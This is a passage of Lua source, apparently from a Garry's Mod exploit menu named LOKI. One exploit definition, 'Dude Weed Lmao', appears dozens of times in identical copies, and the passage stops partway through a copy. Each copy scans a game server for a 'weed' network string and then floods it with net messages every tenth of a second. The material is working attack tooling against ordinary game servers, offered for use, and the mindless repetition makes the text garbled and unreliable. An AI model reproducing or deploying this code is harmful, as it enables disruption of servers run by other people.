  6523. LOKI.AddExploit( "Dude Weed Lmao", {
  6524. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6525. severity = 1,
  6526. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6527. functions = {
  6528. { typ = "func", name = "Big Weed", func = function()
  6529. if !timer.Exists( "loki_bonghit" ) then
  6530. timer.Create( "loki_bonghit", 0.1, 0, function()
  6531. net.Start( "weed" )
  6532. net.WriteString( "DUDE" )
  6533. net.SendToServer()
  6534. end)
  6535. else
  6536. timer.Remove( "loki_bonghit" )
  6537. end
  6538. end, },
  6539. },
  6540. } )
  6541.  
  6542. LOKI.AddExploit( "Dude Weed Lmao", {
  6543. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6544. severity = 1,
  6545. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6546. functions = {
  6547. { typ = "func", name = "Big Weed", func = function()
  6548. if !timer.Exists( "loki_bonghit" ) then
  6549. timer.Create( "loki_bonghit", 0.1, 0, function()
  6550. net.Start( "weed" )
  6551. net.WriteString( "DUDE" )
  6552. net.SendToServer()
  6553. end)
  6554. else
  6555. timer.Remove( "loki_bonghit" )
  6556. end
  6557. end, },
  6558. },
  6559. } )
  6560.  
  6561. LOKI.AddExploit( "Dude Weed Lmao", {
  6562. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6563. severity = 1,
  6564. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6565. functions = {
  6566. { typ = "func", name = "Big Weed", func = function()
  6567. if !timer.Exists( "loki_bonghit" ) then
  6568. timer.Create( "loki_bonghit", 0.1, 0, function()
  6569. net.Start( "weed" )
  6570. net.WriteString( "DUDE" )
  6571. net.SendToServer()
  6572. end)
  6573. else
  6574. timer.Remove( "loki_bonghit" )
  6575. end
  6576. end, },
  6577. },
  6578. } )
  6579.  
  6580. LOKI.AddExploit( "Dude Weed Lmao", {
  6581. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6582. severity = 1,
  6583. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6584. functions = {
  6585. { typ = "func", name = "Big Weed", func = function()
  6586. if !timer.Exists( "loki_bonghit" ) then
  6587. timer.Create( "loki_bonghit", 0.1, 0, function()
  6588. net.Start( "weed" )
  6589. net.WriteString( "DUDE" )
  6590. net.SendToServer()
  6591. end)
  6592. else
  6593. timer.Remove( "loki_bonghit" )
  6594. end
  6595. end, },
  6596. },
  6597. } )
  6598.  
  6599. LOKI.AddExploit( "Dude Weed Lmao", {
  6600. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6601. severity = 1,
  6602. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6603. functions = {
  6604. { typ = "func", name = "Big Weed", func = function()
  6605. if !timer.Exists( "loki_bonghit" ) then
  6606. timer.Create( "loki_bonghit", 0.1, 0, function()
  6607. net.Start( "weed" )
  6608. net.WriteString( "DUDE" )
  6609. net.SendToServer()
  6610. end)
  6611. else
  6612. timer.Remove( "loki_bonghit" )
  6613. end
  6614. end, },
  6615. },
  6616. } )
  6617.  
  6618. LOKI.AddExploit( "Dude Weed Lmao", {
  6619. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6620. severity = 1,
  6621. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6622. functions = {
  6623. { typ = "func", name = "Big Weed", func = function()
  6624. if !timer.Exists( "loki_bonghit" ) then
  6625. timer.Create( "loki_bonghit", 0.1, 0, function()
  6626. net.Start( "weed" )
  6627. net.WriteString( "DUDE" )
  6628. net.SendToServer()
  6629. end)
  6630. else
  6631. timer.Remove( "loki_bonghit" )
  6632. end
  6633. end, },
  6634. },
  6635. } )
  6636.  
  6637. LOKI.AddExploit( "Dude Weed Lmao", {
  6638. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6639. severity = 1,
  6640. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6641. functions = {
  6642. { typ = "func", name = "Big Weed", func = function()
  6643. if !timer.Exists( "loki_bonghit" ) then
  6644. timer.Create( "loki_bonghit", 0.1, 0, function()
  6645. net.Start( "weed" )
  6646. net.WriteString( "DUDE" )
  6647. net.SendToServer()
  6648. end)
  6649. else
  6650. timer.Remove( "loki_bonghit" )
  6651. end
  6652. end, },
  6653. },
  6654. } )
  6655.  
  6656. LOKI.AddExploit( "Dude Weed Lmao", {
  6657. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6658. severity = 1,
  6659. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6660. functions = {
  6661. { typ = "func", name = "Big Weed", func = function()
  6662. if !timer.Exists( "loki_bonghit" ) then
  6663. timer.Create( "loki_bonghit", 0.1, 0, function()
  6664. net.Start( "weed" )
  6665. net.WriteString( "DUDE" )
  6666. net.SendToServer()
  6667. end)
  6668. else
  6669. timer.Remove( "loki_bonghit" )
  6670. end
  6671. end, },
  6672. },
  6673. } )
  6674.  
  6675. LOKI.AddExploit( "Dude Weed Lmao", {
  6676. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6677. severity = 1,
  6678. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6679. functions = {
  6680. { typ = "func", name = "Big Weed", func = function()
  6681. if !timer.Exists( "loki_bonghit" ) then
  6682. timer.Create( "loki_bonghit", 0.1, 0, function()
  6683. net.Start( "weed" )
  6684. net.WriteString( "DUDE" )
  6685. net.SendToServer()
  6686. end)
  6687. else
  6688. timer.Remove( "loki_bonghit" )
  6689. end
  6690. end, },
  6691. },
  6692. } )
  6693.  
  6694. LOKI.AddExploit( "Dude Weed Lmao", {
  6695. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6696. severity = 1,
  6697. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6698. functions = {
  6699. { typ = "func", name = "Big Weed", func = function()
  6700. if !timer.Exists( "loki_bonghit" ) then
  6701. timer.Create( "loki_bonghit", 0.1, 0, function()
  6702. net.Start( "weed" )
  6703. net.WriteString( "DUDE" )
  6704. net.SendToServer()
  6705. end)
  6706. else
  6707. timer.Remove( "loki_bonghit" )
  6708. end
  6709. end, },
  6710. },
  6711. } )
  6712.  
  6713. LOKI.AddExploit( "Dude Weed Lmao", {
  6714. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6715. severity = 1,
  6716. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6717. functions = {
  6718. { typ = "func", name = "Big Weed", func = function()
  6719. if !timer.Exists( "loki_bonghit" ) then
  6720. timer.Create( "loki_bonghit", 0.1, 0, function()
  6721. net.Start( "weed" )
  6722. net.WriteString( "DUDE" )
  6723. net.SendToServer()
  6724. end)
  6725. else
  6726. timer.Remove( "loki_bonghit" )
  6727. end
  6728. end, },
  6729. },
  6730. } )
  6731.  
  6732. LOKI.AddExploit( "Dude Weed Lmao", {
  6733. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6734. severity = 1,
  6735. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6736. functions = {
  6737. { typ = "func", name = "Big Weed", func = function()
  6738. if !timer.Exists( "loki_bonghit" ) then
  6739. timer.Create( "loki_bonghit", 0.1, 0, function()
  6740. net.Start( "weed" )
  6741. net.WriteString( "DUDE" )
  6742. net.SendToServer()
  6743. end)
  6744. else
  6745. timer.Remove( "loki_bonghit" )
  6746. end
  6747. end, },
  6748. },
  6749. } )
  6750.  
  6751. LOKI.AddExploit( "Dude Weed Lmao", {
  6752. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6753. severity = 1,
  6754. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6755. functions = {
  6756. { typ = "func", name = "Big Weed", func = function()
  6757. if !timer.Exists( "loki_bonghit" ) then
  6758. timer.Create( "loki_bonghit", 0.1, 0, function()
  6759. net.Start( "weed" )
  6760. net.WriteString( "DUDE" )
  6761. net.SendToServer()
  6762. end)
  6763. else
  6764. timer.Remove( "loki_bonghit" )
  6765. end
  6766. end, },
  6767. },
  6768. } )
  6769.  
  6770. LOKI.AddExploit( "Dude Weed Lmao", {
  6771. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6772. severity = 1,
  6773. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6774. functions = {
  6775. { typ = "func", name = "Big Weed", func = function()
  6776. if !timer.Exists( "loki_bonghit" ) then
  6777. timer.Create( "loki_bonghit", 0.1, 0, function()
  6778. net.Start( "weed" )
  6779. net.WriteString( "DUDE" )
  6780. net.SendToServer()
  6781. end)
  6782. else
  6783. timer.Remove( "loki_bonghit" )
  6784. end
  6785. end, },
  6786. },
  6787. } )
  6788.  
  6789. LOKI.AddExploit( "Dude Weed Lmao", {
  6790. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6791. severity = 1,
  6792. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6793. functions = {
  6794. { typ = "func", name = "Big Weed", func = function()
  6795. if !timer.Exists( "loki_bonghit" ) then
  6796. timer.Create( "loki_bonghit", 0.1, 0, function()
  6797. net.Start( "weed" )
  6798. net.WriteString( "DUDE" )
  6799. net.SendToServer()
  6800. end)
  6801. else
  6802. timer.Remove( "loki_bonghit" )
  6803. end
  6804. end, },
  6805. },
  6806. } )
  6807.  
  6808. LOKI.AddExploit( "Dude Weed Lmao", {
  6809. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6810. severity = 1,
  6811. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6812. functions = {
  6813. { typ = "func", name = "Big Weed", func = function()
  6814. if !timer.Exists( "loki_bonghit" ) then
  6815. timer.Create( "loki_bonghit", 0.1, 0, function()
  6816. net.Start( "weed" )
  6817. net.WriteString( "DUDE" )
  6818. net.SendToServer()
  6819. end)
  6820. else
  6821. timer.Remove( "loki_bonghit" )
  6822. end
  6823. end, },
  6824. },
  6825. } )
  6826.  
  6827. LOKI.AddExploit( "Dude Weed Lmao", {
  6828. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6829. severity = 1,
  6830. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6831. functions = {
  6832. { typ = "func", name = "Big Weed", func = function()
  6833. if !timer.Exists( "loki_bonghit" ) then
  6834. timer.Create( "loki_bonghit", 0.1, 0, function()
  6835. net.Start( "weed" )
  6836. net.WriteString( "DUDE" )
  6837. net.SendToServer()
  6838. end)
  6839. else
  6840. timer.Remove( "loki_bonghit" )
  6841. end
  6842. end, },
  6843. },
  6844. } )
  6845.  
  6846. LOKI.AddExploit( "Dude Weed Lmao", {
  6847. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6848. severity = 1,
  6849. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6850. functions = {
  6851. { typ = "func", name = "Big Weed", func = function()
  6852. if !timer.Exists( "loki_bonghit" ) then
  6853. timer.Create( "loki_bonghit", 0.1, 0, function()
  6854. net.Start( "weed" )
  6855. net.WriteString( "DUDE" )
  6856. net.SendToServer()
  6857. end)
  6858. else
  6859. timer.Remove( "loki_bonghit" )
  6860. end
  6861. end, },
  6862. },
  6863. } )
  6864.  
  6865. LOKI.AddExploit( "Dude Weed Lmao", {
  6866. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6867. severity = 1,
  6868. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6869. functions = {
  6870. { typ = "func", name = "Big Weed", func = function()
  6871. if !timer.Exists( "loki_bonghit" ) then
  6872. timer.Create( "loki_bonghit", 0.1, 0, function()
  6873. net.Start( "weed" )
  6874. net.WriteString( "DUDE" )
  6875. net.SendToServer()
  6876. end)
  6877. else
  6878. timer.Remove( "loki_bonghit" )
  6879. end
  6880. end, },
  6881. },
  6882. } )
  6883.  
  6884. LOKI.AddExploit( "Dude Weed Lmao", {
  6885. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6886. severity = 1,
  6887. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6888. functions = {
  6889. { typ = "func", name = "Big Weed", func = function()
  6890. if !timer.Exists( "loki_bonghit" ) then
  6891. timer.Create( "loki_bonghit", 0.1, 0, function()
  6892. net.Start( "weed" )
  6893. net.WriteString( "DUDE" )
  6894. net.SendToServer()
  6895. end)
  6896. else
  6897. timer.Remove( "loki_bonghit" )
  6898. end
  6899. end, },
  6900. },
  6901. } )
  6902.  
  6903. LOKI.AddExploit( "Dude Weed Lmao", {
  6904. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6905. severity = 1,
  6906. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6907. functions = {
  6908. { typ = "func", name = "Big Weed", func = function()
  6909. if !timer.Exists( "loki_bonghit" ) then
  6910. timer.Create( "loki_bonghit", 0.1, 0, function()
  6911. net.Start( "weed" )
  6912. net.WriteString( "DUDE" )
  6913. net.SendToServer()
  6914. end)
  6915. else
  6916. timer.Remove( "loki_bonghit" )
  6917. end
  6918. end, },
  6919. },
  6920. } )
  6921.  
  6922. LOKI.AddExploit( "Dude Weed Lmao", {
  6923. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6924. severity = 1,
  6925. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6926. functions = {
  6927. { typ = "func", name = "Big Weed", func = function()
  6928. if !timer.Exists( "loki_bonghit" ) then
  6929. timer.Create( "loki_bonghit", 0.1, 0, function()
  6930. net.Start( "weed" )
  6931. net.WriteString( "DUDE" )
  6932. net.SendToServer()
  6933. end)
  6934. else
  6935. timer.Remove( "loki_bonghit" )
  6936. end
  6937. end, },
  6938. },
  6939. } )
  6940.  
  6941. LOKI.AddExploit( "Dude Weed Lmao", {
  6942. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6943. severity = 1,
  6944. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6945. functions = {
  6946. { typ = "func", name = "Big Weed", func = function()
  6947. if !timer.Exists( "loki_bonghit" ) then
  6948. timer.Create( "loki_bonghit", 0.1, 0, function()
  6949. net.Start( "weed" )
  6950. net.WriteString( "DUDE" )
  6951. net.SendToServer()
  6952. end)
  6953. else
  6954. timer.Remove( "loki_bonghit" )
  6955. end
  6956. end, },
  6957. },
  6958. } )
  6959.  
  6960. LOKI.AddExploit( "Dude Weed Lmao", {
  6961. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6962. severity = 1,
  6963. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6964. functions = {
  6965. { typ = "func", name = "Big Weed", func = function()
  6966. if !timer.Exists( "loki_bonghit" ) then
  6967. timer.Create( "loki_bonghit", 0.1, 0, function()
  6968. net.Start( "weed" )
  6969. net.WriteString( "DUDE" )
  6970. net.SendToServer()
  6971. end)
  6972. else
  6973. timer.Remove( "loki_bonghit" )
  6974. end
  6975. end, },
  6976. },
  6977. } )
  6978.  
  6979. LOKI.AddExploit( "Dude Weed Lmao", {
  6980. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6981. severity = 1,
  6982. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6983. functions = {
  6984. { typ = "func", name = "Big Weed", func = function()
  6985. if !timer.Exists( "loki_bonghit" ) then
  6986. timer.Create( "loki_bonghit", 0.1, 0, function()
  6987. net.Start( "weed" )
  6988. net.WriteString( "DUDE" )
  6989. net.SendToServer()
  6990. end)
  6991. else
  6992. timer.Remove( "loki_bonghit" )
  6993. end
  6994. end, },
  6995. },
  6996. } )
  6997.  
  6998. LOKI.AddExploit( "Dude Weed Lmao", {
  6999. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7000. severity = 1,
  7001. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7002. functions = {
  7003. { typ = "func", name = "Big Weed", func = function()
  7004. if !timer.Exists( "loki_bonghit" ) then
  7005. timer.Create( "loki_bonghit", 0.1, 0, function()
  7006. net.Start( "weed" )
  7007. net.WriteString( "DUDE" )
  7008. net.SendToServer()
  7009. end)
  7010. else
  7011. timer.Remove( "loki_bonghit" )
  7012. end
  7013. end, },
  7014. },
  7015. } )
  7016.  
  7017. LOKI.AddExploit( "Dude Weed Lmao", {
  7018. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7019. severity = 1,
  7020. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7021. functions = {
  7022. { typ = "func", name = "Big Weed", func = function()
  7023. if !timer.Exists( "loki_bonghit" ) then
  7024. timer.Create( "loki_bonghit", 0.1, 0, function()
  7025. net.Start( "weed" )
  7026. net.WriteString( "DUDE" )
  7027. net.SendToServer()
  7028. end)
  7029. else
  7030. timer.Remove( "loki_bonghit" )
  7031. end
  7032. end, },
  7033. },
  7034. } )
  7035.  
  7036. LOKI.AddExploit( "Dude Weed Lmao", {
  7037. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7038. severity = 1,
  7039. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7040. functions = {
  7041. { typ = "func", name = "Big Weed", func = function()
  7042. if !timer.Exists( "loki_bonghit" ) then
  7043. timer.Create( "loki_bonghit", 0.1, 0, function()
  7044. net.Start( "weed" )
  7045. net.WriteString( "DUDE" )
  7046. net.SendToServer()
  7047. end)
  7048. else
  7049. timer.Remove( "loki_bonghit" )
  7050. end
  7051. end, },
  7052. },
  7053. } )
  7054.  
  7055. LOKI.AddExploit( "Dude Weed Lmao", {
  7056. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7057. severity = 1,
  7058. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7059. functions = {
  7060. { typ = "func", name = "Big Weed", func = function()
  7061. if !timer.Exists( "loki_bonghit" ) then
  7062. timer.Create( "loki_bonghit", 0.1, 0, function()
  7063. net.Start( "weed" )
  7064. net.WriteString( "DUDE" )
  7065. net.SendToServer()
  7066. end)
  7067. else
  7068. timer.Remove( "loki_bonghit" )
  7069. end
  7070. end, },
  7071. },
  7072. } )
  7073.  
  7074. LOKI.AddExploit( "Dude Weed Lmao", {
  7075. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7076. severity = 1,
  7077. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7078. functions = {
  7079. { typ = "func", name = "Big Weed", func = function()
  7080. if !timer.Exists( "loki_bonghit" ) then
  7081. timer.Create( "loki_bonghit", 0.1, 0, function()
  7082. net.Start( "weed" )
  7083. net.WriteString( "DUDE" )
  7084. net.SendToServer()
  7085. end)
  7086. else
  7087. timer.Remove( "loki_bonghit" )
  7088. end
  7089. end, },
  7090. },
  7091. } )
  7092.  
  7093. LOKI.AddExploit( "Dude Weed Lmao", {
  7094. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7095. severity = 1,
  7096. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7097. functions = {
  7098. { typ = "func", name = "Big Weed", func = function()
  7099. if !timer.Exists( "loki_bonghit" ) then
  7100. timer.Create( "loki_bonghit", 0.1, 0, function()
  7101. net.Start( "weed" )
  7102. net.WriteString( "DUDE" )
  7103. net.SendToServer()
  7104. end)
  7105. else
  7106. timer.Remove( "loki_bonghit" )
  7107. end
  7108. end, },
  7109. },
  7110. } )
  7111.  
  7112. LOKI.AddExploit( "Dude Weed Lmao", {
  7113. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7114. severity = 1,
  7115. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7116. functions = {
  7117. { typ = "func", name = "Big Weed", func = function()
  7118. if !timer.Exists( "loki_bonghit" ) then
  7119. timer.Create( "loki_bonghit", 0.1, 0, function()
  7120. net.Start( "weed" )
  7121. net.WriteString( "DUDE" )
  7122. net.SendToServer()
  7123. end)
  7124. else
  7125. timer.Remove( "loki_bonghit" )
  7126. end
  7127. end, },
  7128. },
  7129. } )
  7130.  
  7131. LOKI.AddExploit( "Dude Weed Lmao", {
  7132. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7133. severity = 1,
  7134. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7135. functions = {
  7136. { typ = "func", name = "Big Weed", func = function()
  7137. if !timer.Exists( "loki_bonghit" ) then
  7138. timer.Create( "loki_bonghit", 0.1, 0, function()
  7139. net.Start( "weed" )
  7140. net.WriteString( "DUDE" )
  7141. net.SendToServer()
  7142. end)
  7143. else
  7144. timer.Remove( "loki_bonghit" )
  7145. end
  7146. end, },
  7147. },
  7148. } )
  7149.  
  7150. LOKI.AddExploit( "Dude Weed Lmao", {
  7151. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7152. severity = 1,
  7153. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7154. functions = {
  7155. { typ = "func", name = "Big Weed", func = function()
  7156. if !timer.Exists( "loki_bonghit" ) then
  7157. timer.Create( "loki_bonghit", 0.1, 0, function()
  7158. net.Start( "weed" )
  7159. net.WriteString( "DUDE" )
  7160. net.SendToServer()
  7161. end)
  7162. else
  7163. timer.Remove( "loki_bonghit" )
  7164. end
  7165. end, },
  7166. },
  7167. } )
  7168.  
  7169. LOKI.AddExploit( "Dude Weed Lmao", {
  7170. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7171. severity = 1,
  7172. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7173. functions = {
  7174. { typ = "func", name = "Big Weed", func = function()
  7175. if !timer.Exists( "loki_bonghit" ) then
  7176. timer.Create( "loki_bonghit", 0.1, 0, function()
  7177. net.Start( "weed" )
  7178. net.WriteString( "DUDE" )
  7179. net.SendToServer()
  7180. end)
  7181. else
  7182. timer.Remove( "loki_bonghit" )
  7183. end
  7184. end, },
  7185. },
  7186. } )
  7187.  
  7188. LOKI.AddExploit( "Dude Weed Lmao", {
  7189. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7190. severity = 1,
  7191. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7192. functions = {
  7193. { typ = "func", name = "Big Weed", func = function()
  7194. if !timer.Exists( "loki_bonghit" ) then
  7195. timer.Create( "loki_bonghit", 0.1, 0, function()
  7196. net.Start( "weed" )
  7197. net.WriteString( "DUDE" )
  7198. net.SendToServer()
  7199. end)
  7200. else
  7201. timer.Remove( "loki_bonghit" )
  7202. end
  7203. end, },
  7204. },
  7205. } )
  7206.  
  7207. LOKI.AddExploit( "Dude Weed Lmao", {
  7208. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7209. severity = 1,
  7210. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7211. functions = {
  7212. { typ = "func", name = "Big Weed", func = function()
  7213. if !timer.Exists( "loki_bonghit" ) then
  7214. timer.Create( "loki_bonghit", 0.1, 0, function()
  7215. net.Start( "weed" )
  7216. net.WriteString( "DUDE" )
  7217. net.SendToServer()
  7218. end)
  7219. else
  7220. timer.Remove( "loki_bonghit" )
  7221. end
  7222. end, },
  7223. },
  7224. } )
  7225.  
  7226. LOKI.AddExploit( "Dude Weed Lmao", {
  7227. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7228. severity = 1,
  7229. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7230. functions = {
  7231. { typ = "func", name = "Big Weed", func = function()
  7232. if !timer.Exists( "loki_bonghit" ) then
  7233. timer.Create( "loki_bonghit", 0.1, 0, function()
  7234. net.Start( "weed" )
  7235. net.WriteString( "DUDE" )
  7236. net.SendToServer()
  7237. end)
  7238. else
  7239. timer.Remove( "loki_bonghit" )
  7240. end
  7241. end, },
  7242. },
  7243. } )
  7244.  
  7245. LOKI.AddExploit( "Dude Weed Lmao", {
  7246. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7247. severity = 1,
  7248. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7249. functions = {
  7250. { typ = "func", name = "Big Weed", func = function()
  7251. if !timer.Exists( "loki_bonghit" ) then
  7252. timer.Create( "loki_bonghit", 0.1, 0, function()
  7253. net.Start( "weed" )
  7254. net.WriteString( "DUDE" )
  7255. net.SendToServer()
  7256. end)
  7257. else
  7258. timer.Remove( "loki_bonghit" )
  7259. end
  7260. end, },
  7261. },
  7262. } )
  7263.  
  7264. LOKI.AddExploit( "Dude Weed Lmao", {
  7265. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7266. severity = 1,
  7267. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7268. functions = {
  7269. { typ = "func", name = "Big Weed", func = function()
  7270. if !timer.Exists( "loki_bonghit" ) then
  7271. timer.Create( "loki_bonghit", 0.1, 0, function()
  7272. net.Start( "weed" )
  7273. net.WriteString( "DUDE" )
  7274. net.SendToServer()
  7275. end)
  7276. else
  7277. timer.Remove( "loki_bonghit" )
  7278. end
  7279. end, },
  7280. },
  7281. } )
  7282.  
  7283. LOKI.AddExploit( "Dude Weed Lmao", {
  7284. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7285. severity = 1,
  7286. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7287. functions = {
  7288. { typ = "func", name = "Big Weed", func = function()
  7289. if !timer.Exists( "loki_bonghit" ) then
  7290. timer.Create( "loki_bonghit", 0.1, 0, function()
  7291. net.Start( "weed" )
  7292. net.WriteString( "DUDE" )
  7293. net.SendToServer()
  7294. end)
  7295. else
  7296. timer.Remove( "loki_bonghit" )
  7297. end
  7298. end, },
  7299. },
  7300. } )
  7301.  
  7302. LOKI.AddExploit( "Dude Weed Lmao", {
  7303. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7304. severity = 1,
  7305. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7306. functions = {
  7307. { typ = "func", name = "Big Weed", func = function()
  7308. if !timer.Exists( "loki_bonghit" ) then
  7309. timer.Create( "loki_bonghit", 0.1, 0, function()
  7310. net.Start( "weed" )
  7311. net.WriteString( "DUDE" )
  7312. net.SendToServer()
  7313. end)
  7314. else
  7315. timer.Remove( "loki_bonghit" )
  7316. end
  7317. end, },
  7318. },
  7319. } )
  7320.  
  7321. LOKI.AddExploit( "Dude Weed Lmao", {
  7322. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7323. severity = 1,
  7324. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7325. functions = {
  7326. { typ = "func", name = "Big Weed", func = function()
  7327. if !timer.Exists( "loki_bonghit" ) then
  7328. timer.Create( "loki_bonghit", 0.1, 0, function()
  7329. net.Start( "weed" )
  7330. net.WriteString( "DUDE" )
  7331. net.SendToServer()
  7332. end)
  7333. else
  7334. timer.Remove( "loki_bonghit" )
  7335. end
  7336. end, },
  7337. },
  7338. } )
  7339.  
  7340. LOKI.AddExploit( "Dude Weed Lmao", {
  7341. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7342. severity = 1,
  7343. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7344. functions = {
  7345. { typ = "func", name = "Big Weed", func = function()
  7346. if !timer.Exists( "loki_bonghit" ) then
  7347. timer.Create( "loki_bonghit", 0.1, 0, function()
  7348. net.Start( "weed" )
  7349. net.WriteString( "DUDE" )
  7350. net.SendToServer()
  7351. end)
  7352. else
  7353. timer.Remove( "loki_bonghit" )
  7354. end
  7355. end, },
  7356. },
  7357. } )
  7358.  
  7359. LOKI.AddExploit( "Dude Weed Lmao", {
  7360. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7361. severity = 1,
  7362. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7363. functions = {
  7364. { typ = "func", name = "Big Weed", func = function()
  7365. if !timer.Exists( "loki_bonghit" ) then
  7366. timer.Create( "loki_bonghit", 0.1, 0, function()
  7367. net.Start( "weed" )
  7368. net.WriteString( "DUDE" )
  7369. net.SendToServer()
  7370. end)
  7371. else
  7372. timer.Remove( "loki_bonghit" )
  7373. end
  7374. end, },
  7375. },
  7376. } )
  7377.  
  7378. LOKI.AddExploit( "Dude Weed Lmao", {
  7379. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7380. severity = 1,
  7381. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7382. functions = {
  7383. { typ = "func", name = "Big Weed", func = function()
  7384. if !timer.Exists( "loki_bonghit" ) then
  7385. timer.Create( "loki_bonghit", 0.1, 0, function()
  7386. net.Start( "weed" )
  7387. net.WriteString( "DUDE" )
  7388. net.SendToServer()
  7389. end)
  7390. else
  7391. timer.Remove( "loki_bonghit" )
  7392. end
  7393. end, },
  7394. },
  7395. } )
  7396.  
  7397. LOKI.AddExploit( "Dude Weed Lmao", {
  7398. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7399. severity = 1,
  7400. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7401. functions = {
  7402. { typ = "func", name = "Big Weed", func = function()
  7403. if !timer.Exists( "loki_bonghit" ) then
  7404. timer.Create( "loki_bonghit", 0.1, 0, function()
  7405. net.Start( "weed" )
  7406. net.WriteString( "DUDE" )
  7407. net.SendToServer()
  7408. end)
  7409. else
  7410. timer.Remove( "loki_bonghit" )
  7411. end
  7412. end, },
  7413. },
  7414. } )
  7415.  
  7416. LOKI.AddExploit( "Dude Weed Lmao", {
  7417. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7418. severity = 1,
  7419. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7420. functions = {
  7421. { typ = "func", name = "Big Weed", func = function()
  7422. if !timer.Exists( "loki_bonghit" ) then
  7423. timer.Create( "loki_bonghit", 0.1, 0, function()
  7424. net.Start( "weed" )
  7425. net.WriteString( "DUDE" )
  7426. net.SendToServer()
  7427. end)
  7428. else
  7429. timer.Remove( "loki_bonghit" )
  7430. end
  7431. end, },
  7432. },
  7433. } )
  7434.  
  7435. LOKI.AddExploit( "Dude Weed Lmao", {
  7436. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  7437. severity = 1,
  7438. scan = function() return LOKI.ValidNetString( "weed" ) end,
  7439. functions = {
  7440. { typ = "func", name = "Big Weed", func = function()
  7441. if !timer.Exists( "loki_bonghit" ) then
  7442. timer.Create( "loki_bonghit", 0.1, 0, function()
  7443. net.Start( "weed" )
